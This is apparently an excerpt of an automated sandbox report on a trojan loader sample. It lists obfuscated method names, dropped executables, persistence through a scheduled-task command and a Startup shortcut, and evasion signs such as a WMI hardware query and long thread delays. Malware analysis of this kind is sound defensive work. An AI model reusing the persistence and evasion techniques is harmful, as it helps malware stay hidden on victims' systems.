Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, zYGaDtX4dK2rk9sZDn.cs | High entropy of concatenated method names: 'cVl96CpqDM', 'bWo9vytyGg', 'QD35ejUB7J', 'CVl5hQfZrC', 'yGT9VNfLRc', 'zAW9cSuDQH', 'QML9BHZ7kp', 'ooA9McAuTc', 'uLs9xFebNw', 'LXm9KOXoI9'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, z6ivISdWp2AJ9wgyAj.cs | High entropy of concatenated method names: 'Dispose', 'arqhaQkL3o', 'Jr0s1IJBay', 'uYUAAj2Dbe', 'Gihhv2l12n', 'YXkhzJPqin', 'ProcessDialogKey', 'kr0sejkYcF', 'tDDshIrVYC', 'oaVssQdI4X'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, MYCV8nMEqlsK44xms5.cs | High entropy of concatenated method names: 'eVlSUlk4do', 'HqyScZAhNf', 'S9uSMMsRtf', 'dvXSxWu7vt', 'Aq8S10o4Zk', 'SWoSt20gRl', 'jSwSGHftHd', 'dukS8NkTfq', 'gflSgcPbC0', 'sP9SI4UbeT'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, HE2n9dW4U1DsdVPZZK.cs | High entropy of concatenated method names: 'OoOZCA8E9j', 'xhaZrrQ4fu', 'k32Zdj6yvJ', 'xlKZy9uJrA', 'f0GZnSLUlP', 'nCGZwfZ8iA', 'se9ZQJJvOG', 'F61ZWXyA0j', 'UAAZJUUHlB', 'ChKZieQo9Y'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Vj0JHiB7G6ybQSlcTY.cs | High entropy of concatenated method names: 'ht2OHLqdaP', 'x9uOTA57No', 'huXOmZRwJL', 'j2xO1FIvAy', 'tejOGie39E', 'YowO8nEWtA', 'gqXOI8h56a', 'CmMO3uujtJ', 'Y9OOU5yEPv', 'L1wOV2DZrb'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, XvAgkWK92GpW3mdirl.cs | High entropy of concatenated method names: 'ToString', 'L2GfV8xYEt', 'KcYf1oUkZK', 'X6eftY7HC7', 'HYhfGO9m3M', 'WiUf8MQPSa', 'JB3fgqRyA2', 'b12fIPpV6D', 'lOmf3SpnKO', 'cqKfpfMtPS'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, AMFGj7IDacdLWcWuGv.cs | High entropy of concatenated method names: 'AfyQreieJn', 'sg5Qymp1pQ', 'dcKQwwN7V6', 'MAuwvtXBDG', 'ELvwzEFaUo', 'kquQecfcjR', 'ciBQhSYyNW', 'RptQsouRyf', 'riWQZD1HKG', 'hMCQYmA1Vi'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, jdI4XivoDg48OHO0PZ.cs | High entropy of concatenated method names: 'f1SPhRb8JP', 'gZaPZXfpN1', 'b3xPYqcDFa', 'oZRPrOxViG', 'YAkPdMUSUX', 'LD4PnrmQkc', 'c4HPwiKmGk', 'mTf5093kOp', 'rar56AdJgh', 'tp75ayts8y'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, yWawNINotSqR24KjBE.cs | High entropy of concatenated method names: 'zvEnbaejE8', 'Rf3nF4iNWZ', 'wnBytcd78B', 'qqhyGkplpF', 'Gg9y8MhoFl', 'bQjygKiEoD', 'LlQyIh5y4N', 'Yely3A851l', 'Ap9ypwAHpD', 'twJyUPC2fm'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, Xan0n1muaoM5hJxIYH.cs | High entropy of concatenated method names: 'HxMwCNsxxK', 'jbTwdjFFJU', 'fViwnIdgcp', 'FrhwQuIH3L', 'EHjwWNGLQJ', 'iDjno2Ustq', 'mRfnXsSN9M', 'yvun0UhHAg', 'kYPn6F58iq', 'cwBnaEcbwW'
Source: 0.2.SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe.3781038.4.raw.unpack, tsbxymT74IHXdeVDAy.cs | High entropy of concatenated method names: 'mjKylxf4J3', 'SPEyjUlYVm', 'i3ryHMiXKI', 'zGPyTWp6AR', 'vnmyS3M9WS', 'edsyf6F3Wo', 'VGIy98Cmuk', 'UT0y5TxGPV', 'rlqyPLRAR0', 'AkryLc3gFN'
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File created: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File created: C:\Users\user\AppData\Roaming\XClient.exe

Boot Survival

Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\xNgpESfQOvfb" /XML "C:\Users\user\AppData\Local\Temp\tmpA395.tmp"
Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | File created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XClient.lnk

                    Hooking and other Techniques for Hiding and Protection

                    barindex
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe; Process information set: NOOPENFILEERRORBOX (49 identical entries)
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe; Process information set: NOOPENFILEERRORBOX (107 identical entries)

                    Malware Analysis System Evasion

                    Source: Yara matchFile source: Process Memory Space: SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe PID: 672, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: xNgpESfQOvfb.exe PID: 7084, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: AD0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 2550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 4550000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 8E30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 7970000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 9E30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: AE30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 15D0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 2F70000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Memory allocated: 4F70000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: FE0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 2D20000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 2B40000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 8D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 9D80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 9F80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: AF80000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 1340000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 31E0000 memory reserve | memory write watch
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Memory allocated: 2F50000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239874
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239764
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239654
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239546
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239437
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239328
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239218
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 239080
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238968
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238859
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238750
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238640
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238531
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238421
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238312
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238203
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 238093
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237984
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237875
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237765
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237656
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237546
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237436
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237328
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237218
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 237088
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236968
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236817
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236568
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236453
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236302
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236186
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 236065
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 235943
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 235812
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239828
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239715
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239609
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239500
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239391
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239264
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239156
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 239047
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238937
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238828
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238719
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238609
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238500
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238391
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 238025
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237907
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237782
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237657
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237532
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237407
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237295
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237188
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 237063
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 236938
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 236766
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 236579
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 236438
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 236313
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Window / User API: threadDelayed 2706
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Window / User API: threadDelayed 3563
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 9086
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 353
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7372
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Window / User API: threadDelayed 7297
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe Window / User API: threadDelayed 2510
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Window / User API: threadDelayed 1786
                    Source: C:\Users\user\AppData\Roaming\xNgpESfQOvfb.exe Window / User API: threadDelayed 3561
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -18446744073709540s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -240000s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239874s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239764s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239654s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239546s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239437s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239328s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239218s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -239080s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238968s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238859s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238750s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238640s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238531s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238421s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238312s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238203s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -238093s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237984s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237875s >= -30000s
                    Source: C:\Users\user\Desktop\SecuriteInfo.com.TrojanLoader.MSIL.DaVinci.Heur.29424.1974.exe TID: 6856 Thread sleep time: -237765s >= -30000s
